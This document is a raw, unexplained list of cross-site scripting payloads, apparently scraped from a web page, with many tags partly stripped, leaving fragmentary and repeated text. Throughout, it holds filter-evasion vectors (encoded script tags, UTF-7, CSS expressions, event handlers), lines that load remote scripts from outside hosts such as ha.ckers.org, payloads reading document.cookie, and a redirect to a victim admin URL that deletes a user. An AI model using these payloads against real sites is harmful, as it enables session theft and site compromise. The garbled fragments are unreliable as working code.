@im\port’\ja\vasc\ript:document.vulnerable=true'; exp/* document.vulnerable=true; .XSS{background-image:url(“javascript:document.vulnerable=true”);} BODY{background:url(“javascript:document.vulnerable=true”)} <![<IMG SRC="javas]]]] <IMG SRC="javascript:document.vulnerable=true”> <t:set attributeName="innerHTML" to="XSSdocument.vulnerable=true”> <? echo('document.vulnerable=true’); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=document.vulnerable=true”> +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- &document.vulnerable=true; <a href="about:document.vulnerable=true;”> document.vulnerable=true; <!–document.vulnerable=true;//–> <document.vulnerable=true; <![<!–]]document.vulnerable=true;//–> document.vulnerable=true; ” onmouseover=”document.vulnerable=true;”> document.vulnerable=true;; [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> @import’http://www.securitycompass.com/xss.css'; <meta HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss”)} XSS <!–#exec cmd="/bin/echo ' ” SRC=”http://www.securitycompass.com/xss.js”> ” SRC=”http://www.securitycompass.com/xss.js”> ” ” SRC=”http://www.securitycompass.com/xss.js”> ‘” SRC=”http://www.securitycompass.com/xss.js”> ` SRC=”http://www.securitycompass.com/xss.js”> ‘>” SRC=”http://www.securitycompass.com/xss.js”> document.write(“<SCRI");PT SRC=”http://www.securitycompass.com/xss.js”> [Mozilla] “;>;; ;;alert(1); ; ;alert(1); ; perl -e 'print \”;;\”;;' >; out perl -e 'print \”;;alert(\”;XSS\”;);\”;;' >; out “>alert(‘XSS’) XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))> XSS STYLE=xss:e/**/xpression(alert(‘XSS’))> >”>alert(“XSS”)& “>@import”javascript:alert(‘XSS’)”; >”‘> >%22%27> ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’ ”;!–“= <IMG SRC=JaVaScRiPt:alert("XSS")> <IMGSRC=java&#115;crip&#116;:ale&#114;t('X&#83;S'&#41> <IMGSRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert(‘XSS’);”> <IMG SRC="jav ascript:alert(‘XSS’);”> <![CDATA[var n=0;while(true){n++;}]]> <![CDATA[SCRIPT]]>alert(‘gotcha’);<![CDATA[/SCRIPT]]> <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; alert(‘XSS’) %3cscript%3ealert(‘XSS’)%3c/script%3e %22%3e%3cscript%3ealert(‘XSS’)%3c/script%3e alert(“XSS”)”> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < <alert(“XSS”);//< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) fooalert(1) <script>alert(1)</script> String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) =(◕_◕)=" title="+ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie) alert(1) “>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101)) ‘;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“=0\”autofocus/onfocus=alert(1)–>”-confirm(3)-” xxs link xxs link alert(“XSS”)”> <alert(“XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js? <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// alert(‘XSS’); alert(“XSS”); li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS @import’http://ha.ckers.org/xss.css'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)} @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* alert(‘XSS’); .XSS{background-image:url(“javascript:alert(‘XSS’)”);} BODY{background:url(“javascript:alert(‘XSS’)”)} ¼script¾alert(¢XSS¢)¼/script¾ <!–#exec cmd="/bin/echo ' <? echo('alert(“XSS”)’); ?> <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”> +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> XSS 0\”autofocus/onfocus=alert(1)–>”-confirm(3)-” veris–>group element[attribute=’ [
[” onmouseover=”alert(‘RVRSH3LL_XSS’);” ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; alert;pg(“XSS”) for((i)in(self))eval(i)(1) <script>alert(1)</script><script>alert(1)</script> <sCRiPt>alert(1)</SCrIPt> test %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; “>”>123 “>123 “>123 “>alert(`TEXT YOU WANT TO BE DISPLAYED`);123 “>123 >Hover the cursor to the LEFT of this Message&ParamHeight=250 “>”>123 “>123 <iframe src=http://xss.rocks/scriptlet.html < {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=“ onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=“&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /**/alert(1)/**/</script /**/ "> <iframe/src="data:text/html,”> <script xlink:href=data&colon;,window.open('https://www.google.com/') </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ‘`”>javascript:alert(1) ‘`”>javascript:alert(1) \x3Cscript>javascript:alert(1) ‘”`>/* *\x2Fjavascript:alert(1)// */ javascript:alert(1)</script\x0D javascript:alert(1)</script\x0A javascript:alert(1)</script\x0B javascript:alert(1) <!–\x3E –> –> –> –> –> –> `”‘> test “‘`>a=’hello\x27;javascript:alert(1)//'; test test test test test test test test test test test test test test /* *\x2A/javascript:alert(1)// */ /* *\x00/javascript:alert(1)// */ </style\x3E </style\x0D </style\x09 </style\x20 </style\x0A “‘`>ABCDEF “‘`>ABCDEF if(“x\\xE1\x96\x89″.length==2) { javascript:alert(1);} if(“x\\xE0\xB9\x92″.length==2) { javascript:alert(1);} if(“x\\xEE\xA9\x93″.length==2) { javascript:alert(1);} ‘`”>javascript:alert(1) ‘`”>javascript:alert(1) “‘`> “‘`> javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> “`’>\x3Bjavascript:alert(1) “`’>\x0Djavascript:alert(1) “`’>\xEF\xBB\xBFjavascript:alert(1) “`’>\xE2\x80\x81javascript:alert(1) “`’>\xE2\x80\x84javascript:alert(1) “`’>\xE3\x80\x80javascript:alert(1) “`’>\x09javascript:alert(1) “`’>\xE2\x80\x89javascript:alert(1) “`’>\xE2\x80\x85javascript:alert(1) “`’>\xE2\x80\x88javascript:alert(1) “`’>\x00javascript:alert(1) “`’>\xE2\x80\xA8javascript:alert(1) “`’>\xE2\x80\x8Ajavascript:alert(1) “`’>\xE1\x9A\x80javascript:alert(1) “`’>\x0Cjavascript:alert(1) “`’>\x2Bjavascript:alert(1) “`’>\xF0\x90\x96\x9Ajavascript:alert(1) “`’>-javascript:alert(1) “`’>\x0Ajavascript:alert(1) “`’>\xE2\x80\xAFjavascript:alert(1) “`’>\x7Ejavascript:alert(1) “`’>\xE2\x80\x87javascript:alert(1) “`’>\xE2\x81\x9Fjavascript:alert(1) “`’>\xE2\x80\xA9javascript:alert(1) “`’>\xC2\x85javascript:alert(1) “`’>\xEF\xBF\xAEjavascript:alert(1) “`’>\xE2\x80\x83javascript:alert(1) “`’>\xE2\x80\x8Bjavascript:alert(1) “`’>\xEF\xBF\xBEjavascript:alert(1) “`’>\xE2\x80\x80javascript:alert(1) “`’>\x21javascript:alert(1) “`’>\xE2\x80\x82javascript:alert(1) “`’>\xE2\x80\x86javascript:alert(1) “`’>\xE1\xA0\x8Ejavascript:alert(1) “`’>\x0Bjavascript:alert(1) “`’>\x20javascript:alert(1) “`’>\xC2\xA0javascript:alert(1) “/> “/> “/> “/> “/> “/> “/> “/> “/> javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) “> “> “> “> “> “> “> “> “> “> “> “> “> “> “> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> javascript:alert(1) <video poster=javascript:javascript:alert(1)// …………… X X CLICKME CLICKME <!– <img src=" <img src=" XXX javascript:alert(1) <b alert(1)0 document.getElementById(“div2″).innerHTML = document.getElementById(“div1″).innerHTML; x javascript:alert(1)”> javascript:alert(1)”> javascript:alert(1)”> javascript:alert(1)’>”> javascript:alert(1)”> javascript:alert(1)”> d.innerHTML=d.innerHTML XXX <img src="x` `javascript:alert(1)”` `> “> <!–[if –> X p[foo=bar{}*{-o-link:’javascript:javascript:alert(1)’}{}*{-o-link-source:current}]{color:red}; <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d @import “data:,*%7bx:expression(javascript:alert(1))%7D”; XXXXXX *[{}@import’%(css)s?]X XXX XXX *{x:expression(javascript:alert(1))} X X with(document.getElementById(“d”))innerHTML=innerHTML X X XXX #x{font-family:foo[bar;color:green;} #y];color:red;{} XXX ({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval ({0:#0=eval/#0#/#0#(javascript:alert(1))}) ReferenceError.prototype.__defineGetter__(‘name’, function(){javascript:alert(1)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘javascript:alert(1)’)() &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi &alert&A7&(1)&R&UA;&& ¼script¾javascript:alert(1)¼/script¾ X 1 1 1 XXX x %(payload)s javascript:alert(1) <SCRIPT SRC=%(jscript)s? <%(payload)s//< <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < @import’%(css)s'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> li {list-style-image: url(“javascript:javascript:alert(1)”);}XSS javascript:alert(1); .XSS{background-image:url(“javascript:javascript:alert(1)”);} BODY{background:url(“javascript:javascript:alert(1)”)} XSS”””,”XML namespace.”),(“””<IMG SRC=”javascript:javascript:alert(1)”> +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- X @import’%(css)s'; a{background:url(‘s1′ ‘s2)}@import javascript:javascript:alert(1);’);} &&javascript:alert(1)&&;&& javascript:alert(1); <![CDATA[<IMG SRC="javas]]]] test1 test1 <embed width=500 height=500 code="data:text/html,%(payload)s”> “> ‘;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//– >”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= xxs link xxs link alert(“XSS”)”> perl -e ‘print “”;’ > out <alert(“XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js? <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// alert(“XSS”); li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS @import’http://ha.ckers.org/xss.css'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)} @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* alert(‘XSS’); .XSS{background-image:url(“javascript:alert(‘XSS’)”);} BODY{background:url(“javascript:alert(‘XSS’)”)} BODY{background:url(“javascript:alert(‘XSS’)”)} ¼script¾alert(¢XSS¢)¼/script¾ <!–#exec cmd="/bin/echo ' <? echo('alert(“XSS”)’); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”> +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> XSS XSS XSS XSS XSS XSS {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=“ onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=“&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /**/alert(1)/**/</script /**/ "> <iframe/src="data:text/html,”> </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me ”;!–“=’>//\\,”>”>”*” ‘); alert(‘XSS alert(1); alert(‘XSS’); alert(“XSS”)”> <script>alert(‘XSS’);</script> alert(String.fromCharCode(88,83,83)) @im\port’\ja\vasc\ript:alert(\”XSS\”)'; <? echo('alert(\”XSS\”)’); ?> alert(‘XSS’) “>alert(0) alert(/xss/) alert(/xss/) alert(‘XSS’) window.alert(“Bonjour !”); <iframe onload=alert(‘XSS’)> “><script alert(String.fromCharCode(88,83,83)) ‘>>XSS ‘”>>alert(‘XSS’) ‘”>>XSS var var = 1; alert(var) BODY{background:url(“javascript:alert(‘XSS’)”)} <?='alert(“XSS”)’?> ” onfocus=alert(document.domain) “> <" li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}XSS perl -e ‘print \”alert(\”XSS\”)\”;’ > out perl -e ‘print \”\”;’ > out alert(1) alert(1) “> [color=red width=expression(alert(123))][color] Execute(MsgBox(chr(88)&chr(83)&chr(83)))alert(123) ‘”>alert(1111) ‘”>alert(document.cookie) ‘””> alert(‘X \nS \nS’); <<<>>><<alert(123) (123)(123) ‘>alert(123) ‘>”> }a=eval;b=alert;a(b(/XSS/.source)); document.write(“XSS”); a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d); =’>alert(“xss”) “+src=”http://yoursite.com/xss.js?69,69″> alert(navigator.userAgent)> “>/XaDoS/>alert(document.cookie) “>/KinG-InFeT.NeT/>alert(document.cookie) src=”http://www.site.com/XSS.js”> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !–” />alert(‘xss’); alert(“XSS by \nxss”)XSS by xss “>alert(“XSS by \nxss”)>XSS by xss ‘”>alert(“XSS by \nxss”)>XSS by xss alert(“XSS by \nxss”)XSS by xss alert(1337)XSS by xss “>alert(1337)”>alert(“XSS by \nxss ‘”>alert(1337)>XSS by xss XSS by xss ‘>alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83)); >”>alert(561177485777)%3B alert(“XSS”); ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!–"<XSS>=&{()} <SCRIPT>alert('XSS')</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BGSOUND SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*<XSS STYLE='no\xss:noxss("*//*"); <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> <HTML xmlns:xss> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert('XSS')"></B></I></XML> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <!–[if gte IE 4]> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!–#exec cmd="/bin/echo '<SCRIPT SRC'"–><!–#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"–> <? echo('<SCR)'; <BR SIZE="&{alert('XSS')}"> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- \";alert('XSS');// </TITLE><SCRIPT>alert(“XSS”);</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > perl -e 'print "<IMG SRC=javascript:alert("XSS")>";'> out perl -e 'print "&<SCRIPT>alert("XSS")</SCRIPT>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h tt p://6 6.000146.0×7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> document.vulnerable=true; <document.vulnerable=true;//< <script document.vulnerable=true; <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < a=/XSS/\ndocument.vulnerable=true; \”;document.vulnerable=true;;// document.vulnerable=true; li {list-style-image: url(“javascript:document.vulnerable=true;”);XSS 1script3document.vulnerable=true;1/script3 @im\port’\ja\vasc\ript:document.vulnerable=true'; exp/* document.vulnerable=true; .XSS{background-image:url(“javascript:document.vulnerable=true”);} BODY{background:url(“javascript:document.vulnerable=true”)} <![<IMG SRC="javas]]]] <IMG SRC="javascript:document.vulnerable=true”> <t:set attributeName="innerHTML" to="XSSdocument.vulnerable=true”> <? echo('document.vulnerable=true’); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=document.vulnerable=true”> +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- &document.vulnerable=true; <a href="about:document.vulnerable=true;”> document.vulnerable=true; <!–document.vulnerable=true;//–> <document.vulnerable=true; <![<!–]]document.vulnerable=true;//–> document.vulnerable=true; ” onmouseover=”document.vulnerable=true;”> document.vulnerable=true;; [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> @import’http://www.securitycompass.com/xss.css'; <meta HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss”)} XSS <!–#exec cmd="/bin/echo ' ” SRC=”http://www.securitycompass.com/xss.js”> ” SRC=”http://www.securitycompass.com/xss.js”> ” ” SRC=”http://www.securitycompass.com/xss.js”> ‘” SRC=”http://www.securitycompass.com/xss.js”> ` SRC=”http://www.securitycompass.com/xss.js”> ‘>” SRC=”http://www.securitycompass.com/xss.js”> document.write(“<SCRI");PT SRC=”http://www.securitycompass.com/xss.js”> [Mozilla] "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> </script><script>alert(1)</script> </br style=a:expression(alert())> <scrscriptipt>alert(1)</scrscriptipt> 